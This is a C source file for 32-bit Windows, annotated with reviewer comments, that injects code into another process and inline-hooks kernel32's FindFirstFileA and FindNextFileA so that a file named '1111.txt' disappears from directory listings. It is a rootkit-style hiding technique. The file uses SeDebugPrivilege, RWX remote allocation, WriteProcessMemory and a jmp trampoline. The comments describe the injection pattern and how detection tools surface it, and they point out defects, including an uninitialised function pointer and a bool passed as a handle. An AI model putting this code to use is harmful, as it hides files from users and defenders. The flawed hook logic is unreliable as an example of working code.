#include <winsock2.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <windows.h>
#include <malloc.h>
#include <stdio.h>
#include <Psapi.h>
#include <winsock2.h>
#include <Tlhelp32.h>
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"user32")
#pragma comment(lib,"psapi")
#include <winbase.h>
/*
 * Bookkeeping for one module that gets hooked in the target process.
 *
 * For reviewers/analysts, what this translation unit does as a whole: it
 * enables SeDebugPrivilege, opens a process by PID with PROCESS_ALL_ACCESS,
 * copies the local kernel32.dll image into RWX memory allocated in that
 * process, copies the two hook functions below into the process as well, and
 * overwrites the entry of FindFirstFileA / FindNextFileA with a
 * `mov eax,imm32 ; jmp eax` trampoline to those hooks.  The hooks skip
 * directory entries named "1111.txt".  That call sequence
 * (AdjustTokenPrivileges -> OpenProcess -> VirtualAllocEx with
 * PAGE_EXECUTE_READWRITE -> WriteProcessMemory -> VirtualProtectEx on a
 * kernel32 code page -> 7-byte write at an export) is the standard
 * cross-process inline-patch pattern that process-injection telemetry and
 * export-prologue integrity checks are designed to surface.
 */
typedef struct
{
HMODULE hModule;// handle of the module in THIS process (GetModuleHandle)
LPVOID lpNewBaseOfDll;// base of the backup copy of the module inside the target process (VirtualAllocEx)
MODULEINFO modinfo;// MODULEINFO of the local module (GetModuleInformation)
}DLLINFO, *PDLLINFO;
#pragma comment (lib,"Advapi32.lib")
/*
 * Creates a backup copy of module pszDll inside the target process.
 *
 * pszDll      module name; it must already be loaded in THIS process, because
 *             the base address and SizeOfImage come from GetModuleHandle /
 *             GetModuleInformation on the current process.
 * pDllInfo    receives hModule, modinfo and lpNewBaseOfDll.
 * prochandle  handle to the target process (main opens it with
 *             PROCESS_ALL_ACCESS).
 * Returns 1 on success, 0 after printing a message on failure.
 *
 * Assumption baked in: the module is mapped at the same base in the target as
 * here, since ReadProcessMemory below reads the target at the LOCAL base
 * address.  NOTE(review): holds only while both processes see the same
 * kernel32 base - TODO confirm on the intended OS.
 */
BOOL InitDll(char *pszDll, PDLLINFO pDllInfo,HANDLE prochandle)
{
pDllInfo->hModule = GetModuleHandle(pszDll);// local handle: this is local information, so this program itself must have the dll loaded
if(!pDllInfo->hModule)
{
printf("pDllInfo->hModule is null! in InitDll");
return 0;
}
if(!GetModuleInformation(GetCurrentProcess(), pDllInfo->hModule, &pDllInfo->modinfo, sizeof(MODULEINFO)))// base address and SizeOfImage of the local module
{
printf("Error:GetModuleInformation in InitDll");
return 0;
}
pDllInfo->lpNewBaseOfDll = VirtualAllocEx(prochandle,0,pDllInfo->modinfo.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);// RWX region in the target sized to hold the whole image
if(!pDllInfo->lpNewBaseOfDll)
{
printf("Error:VirtualAllocEx in InitDll");// error handling
return 0;
}
BYTE * buffer=(BYTE *)malloc(pDllInfo->modinfo.SizeOfImage);// staging buffer for the image; result unchecked and never freed (leak)
ReadProcessMemory(prochandle,pDllInfo->modinfo.lpBaseOfDll,buffer,pDllInfo->modinfo.SizeOfImage,0);// read the module image out of the target at the local base; return value unchecked
WriteProcessMemory(prochandle,pDllInfo->lpNewBaseOfDll,buffer,pDllInfo->modinfo.SizeOfImage,0);// write it to the backup location as-is (no relocation fix-ups); return value unchecked
return 1;
}
/*
 * Replacement for kernel32!FindNextFileA, installed by hook_api.
 *
 * This body never runs in this process: hook_api copies its first 500 bytes
 * verbatim into the target and then patches the immediates of `oldproc` and
 * `Getproc` at fixed byte offsets (11 and 18) from the first byte.  The code
 * therefore has to be position-independent (no calls into this module, no
 * string literals - names are built on the stack and resolved through
 * GetProcAddress), and the size of its compiled prologue must not change;
 * the original author's remark about `__asm NOP` below is about that.
 *
 * Behaviour: calls the backup copy of the original FindNextFileA(find, data),
 * then, while the returned cFileName starts with "1111.txt", advances to the
 * next entry, so that file never shows up in a listing.  Returns the BOOL of
 * the last FindNextFileA call that was made.
 *
 * NOTE(review): unlike hook_FindFirstFileA, `findnext` is never assigned here
 * before the `call ebx` that uses it, and the handle argument of that call is
 * taken from `myret` (a bool) rather than from `find`.
 */
BOOL __stdcall hook_FindNextFileA(HANDLE find,PWIN32_FIND_DATA data)
{
//__asm NOP// original author's note: if the kernel32-lookup block below is removed, uncomment this line. Without that block the function prologue lacks one `push esi`, so one byte must be added to keep `oldproc` at the offset hook_api patches.
int oldproc=0x11223344;// placeholder immediate; hook_api overwrites it with the address of the backup FindNextFileA
int Getproc=0x11111111;// placeholder immediate; hook_api overwrites it with the address of GetProcAddress
int keraddr;// kernel32.dll base, found by walking the PEB loader list below
int findnext;// NOTE(review): read by `call ebx` below but never assigned in this function
int Geterror;// address of GetLastError, resolved at run time
bool myret;
__asm
{
mov eax,fs:0x30// TEB -> PEB (32-bit)
mov eax,[eax+0x0c]// PEB.Ldr
mov esi,[eax+0x1c]// InInitializationOrderModuleList.Flink
lodsd// eax = the following list entry
mov eax,[eax + 0x08]// its DllBase
mov keraddr,eax// taken to be kernel32.dll; relies on the module order of older 32-bit Windows - TODO confirm
}
__asm
{
push 0x00000000// NUL terminator
push 0x726f7272// "rror"
push 0x45747361// "astE"
push 0x4c746547// "GetL" - the stack now holds "GetLastError\0", built here so the copied code carries no data references
push esp// lpProcName = pointer to that string
push keraddr// hModule = kernel32
call Getproc// GetProcAddress(kernel32, "GetLastError")
mov Geterror,eax// address of GetLastError
}
int temp;
__asm
{
push data
push find
mov eax,oldproc
call eax// backup copy of the original FindNextFileA(find, data)
mov temp,eax// its BOOL result
}
char * myname=data->cFileName;// name of the entry just returned
__asm
{
first:
mov eax,myname
mov ebx,0x31313131// "1111"
cmp [eax],ebx
jne myno
mov eax,myname
mov ebx,0x7478742e// ".txt"
cmp [eax+4],ebx
jne myno// not "1111.txt": hand the entry back unchanged
push data
push myret// NOTE(review): this is the hFindFile argument; hook_FindFirstFileA pushes its HANDLE result here, this function pushes a bool
mov ebx,findnext
call ebx// matched: call FindNextFileA again to skip this entry
mov temp,eax
mov ebx,ERROR_NO_MORE_FILES
call Geterror
cmp eax,ebx
jne first// more entries: re-check the new name; otherwise fall through with the "no more files" result
myno:
NOP
}
myret=(bool)temp;
return myret;
}
/*
 * Replacement for kernel32!FindFirstFileA, installed by hook_api.
 *
 * Same constraints as hook_FindNextFileA: the first 500 bytes of this
 * function are copied into the target process and the immediates of
 * `oldproc` and `Getproc` are patched at fixed offsets (11 and 18), so the
 * body must be position-independent and its prologue size must not change.
 * FindNextFileA and GetLastError are resolved at run time from kernel32 via
 * the patched GetProcAddress, with their names assembled on the stack.
 *
 * Behaviour: calls the backup copy of the original FindFirstFileA(find, data)
 * and returns its search handle; while the cFileName it produced starts with
 * "1111.txt", FindNextFileA(handle, data) is called to replace it with the
 * following entry, until GetLastError() reports ERROR_NO_MORE_FILES.
 * Note that when the loop ends that way the handle is still returned as if
 * a first entry had been found.
 */
HANDLE __stdcall hook_FindFirstFileA(LPCTSTR find,LPWIN32_FIND_DATA data)
{
int oldproc=0x11223344;// placeholder immediate; hook_api overwrites it with the address of the backup FindFirstFileA
int Getproc=0xffbbaadd;// placeholder immediate; hook_api overwrites it with the address of GetProcAddress
int keraddr;// kernel32.dll base, found by walking the PEB loader list below
int findnext;// address of FindNextFileA, resolved at run time
int Geterror;// address of GetLastError, resolved at run time
__asm
{
mov eax,fs:0x30// TEB -> PEB (32-bit)
mov eax,[eax+0x0c]// PEB.Ldr
mov esi,[eax+0x1c]// InInitializationOrderModuleList.Flink
lodsd// eax = the following list entry
mov eax,[eax + 0x08]// its DllBase
mov keraddr,eax// taken to be kernel32.dll; relies on the module order of older 32-bit Windows - TODO confirm
}
__asm
{
push 0x00000041// "A\0\0\0"
push 0x656c6946// "File"
push 0x7478654e// "Next"
push 0x646e6946// "Find" - the stack now holds "FindNextFileA\0"
push esp// lpProcName
push keraddr// hModule = kernel32
call Getproc// GetProcAddress(kernel32, "FindNextFileA")
mov findnext,eax// address of FindNextFileA
push 0x00000000// NUL terminator
push 0x726f7272// "rror"
push 0x45747361// "astE"
push 0x4c746547// "GetL" - the stack now holds "GetLastError\0"
push esp// lpProcName
push keraddr// hModule = kernel32
call Getproc// GetProcAddress(kernel32, "GetLastError")
mov Geterror,eax// address of GetLastError
}
HANDLE myret;
__asm
{
push data
push find
mov edx,oldproc
call edx// backup copy of the original FindFirstFileA(find, data)
mov myret,eax// search handle (or INVALID_HANDLE_VALUE, which is not checked before the loop)
}
char * myname=data->cFileName;// name of the entry just found
__asm
{
first:
mov eax,myname
mov ebx,0x31313131// "1111"
cmp [eax],ebx
jne myno
mov eax,myname
mov ebx,0x7478742e// ".txt"
cmp [eax+4],ebx
jne myno// not "1111.txt": hand the entry back unchanged
push data
push myret// hFindFile
mov ebx,findnext
call ebx// matched: FindNextFileA(myret, data) to skip this entry
mov ebx,ERROR_NO_MORE_FILES
call Geterror
cmp eax,ebx
jne first// more entries: re-check the new name; otherwise fall through
myno:
NOP
}
return myret;
}
/*
 * Redirects export `name` of the module described by pDllInfo to hackfunc
 * inside the target process.
 *
 * pDllInfo    module bookkeeping filled in by InitDll.
 * name        exported function name.
 * hackfunc    address (in THIS process) of the replacement function; its
 *             first 500 bytes are copied into the target with no size check.
 * pNewFunc    out: address of the untouched copy of the original function
 *             inside the backup image; this is what the hook calls as
 *             `oldproc`.
 * prochandle  target process handle.
 * Returns 1 on success, 0 after printing a message on failure.
 *
 * Layout dependencies: the 7-byte patch `B8 imm32 / FF E0` is written over
 * the original entry without saving the replaced bytes (the backup image is
 * the only copy of the original), and the `oldproc` / `Getproc` immediates in
 * the copied hook are assumed to sit at offsets 11 and 18 from the hook's
 * first byte - valid only for the compiled prologue of hook_FindFirstFileA /
 * hook_FindNextFileA as built here (see the `__asm NOP` note there).
 * Results of VirtualAllocEx and every WriteProcessMemory are not checked.
 */
int hook_api(PDLLINFO pDllInfo, char *name, DWORD hackfunc, DWORD *pNewFunc,HANDLE prochandle)
{
DWORD dw, dwOrigFunc;
MEMORY_BASIC_INFORMATION mbi;
dwOrigFunc = (DWORD)GetProcAddress(pDllInfo->hModule, name);// resolved in THIS process; the author assumes the api has the same address in every process, so the local one is used
if(dwOrigFunc == NULL)
{
printf("Error:GetProcAddress in hook_api");// error handling
return 0;
}
if(!VirtualQueryEx(prochandle,(void *)dwOrigFunc,&mbi,sizeof(MEMORY_BASIC_INFORMATION)))// memory region holding the api in the target
{
printf("Error:VirtualQueryEx in hook_api");
return 0;
}
if(!VirtualProtectEx(prochandle,mbi.BaseAddress,mbi.RegionSize,PAGE_EXECUTE_READWRITE,&dw))// make the whole region writable+executable; the previous protection (dw) is never restored
{
printf("Error:VirtualProtectEx in hook_api");
return 0;
}
LPVOID funcaddr=VirtualAllocEx(prochandle,0,500,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);// RWX cell for the hook body; 500 is an assumed upper bound on its size, result unchecked
WriteProcessMemory(prochandle,funcaddr,(void *)hackfunc/*func*/,500,0);// copy 500 bytes of the hook's machine code from this process; return value unchecked
// where the untouched original function lives inside the backup image
*pNewFunc = dwOrigFunc - (DWORD)pDllInfo->modinfo.lpBaseOfDll + (DWORD)pDllInfo->lpNewBaseOfDll;
// patch the original entry: mov eax,funcaddr ; jmp eax (7 bytes; the overwritten bytes are not saved)
BYTE b8=0xb8;//mov eax,XX XX XX XX
WriteProcessMemory(prochandle,(LPVOID)dwOrigFunc,&b8,1,0);
WriteProcessMemory(prochandle,(LPVOID)(dwOrigFunc+1),&funcaddr,4,0);
BYTE e0ff[2]={0xFF,0xE0};//jmp eax
WriteProcessMemory(prochandle,(LPVOID)(dwOrigFunc+5),&e0ff,2,0);
DWORD temp=*pNewFunc;
WriteProcessMemory(prochandle,(LPVOID)((DWORD)funcaddr+11),&temp,4,0);// fill the hook's `oldproc` immediate, assumed at byte 11 of the copied hook
temp=(DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"GetProcAddress");
WriteProcessMemory(prochandle,(LPVOID)((DWORD)funcaddr+18),&temp,4,0);// fill the hook's `Getproc` immediate, assumed at byte 18
printf("func:%x,old:%x,new:%x\n",funcaddr,dwOrigFunc,*pNewFunc);// debug output; funcaddr is a pointer printed with %x
return 1;
}
/*
 * Enables SeDebugPrivilege on the current process token so that the later
 * OpenProcess on an arbitrary PID succeeds.  None of the three calls' results
 * are checked and the token handle is never closed; if the privilege is not
 * present on the token (typically a non-administrator), AdjustTokenPrivileges
 * reports that silently and the later OpenProcess may fail.
 */
void UpToDebug()// adjust the token to obtain debug privilege
{
HANDLE token;
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&token);// result unchecked; token left uninitialized on failure
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount =1;
LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid);// LUID of SeDebugPrivilege
tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(token,0,&tp,sizeof(tp),0,0);// enable it; result unchecked, token never closed
}
/*
 * Entry point.  argv[1] is the PID of the target process.
 *
 * Nonstandard `void main`.  argc is not checked, so running without an
 * argument dereferences argv[1] (NULL); atoi reports no parse errors.  The
 * process handle and the results of both hook_api calls are not checked, and
 * the handle is never closed.
 */
void main(int argc, char **argv)
{
UpToDebug();// raise to debug privilege
HANDLE inhandle=OpenProcess(PROCESS_ALL_ACCESS,1,(DWORD)atoi(argv[1]));// open the target with full access and an inheritable handle; result unchecked
DLLINFO user32_dll;// despite the name, this describes kernel32.dll
if(!InitDll("kernel32.dll",&user32_dll,inhandle)) return;// back up the target dll into the target process
DWORD new_FindFirstFileA;
hook_api(&user32_dll, "FindFirstFileA", (DWORD)hook_FindFirstFileA, &new_FindFirstFileA,inhandle);// install the hooks; results unchecked
hook_api(&user32_dll, "FindNextFileA", (DWORD)hook_FindNextFileA, &new_FindFirstFileA,inhandle);// same out-variable reused; hook_api writes the value into the target immediately, so the overwrite is harmless
return;
}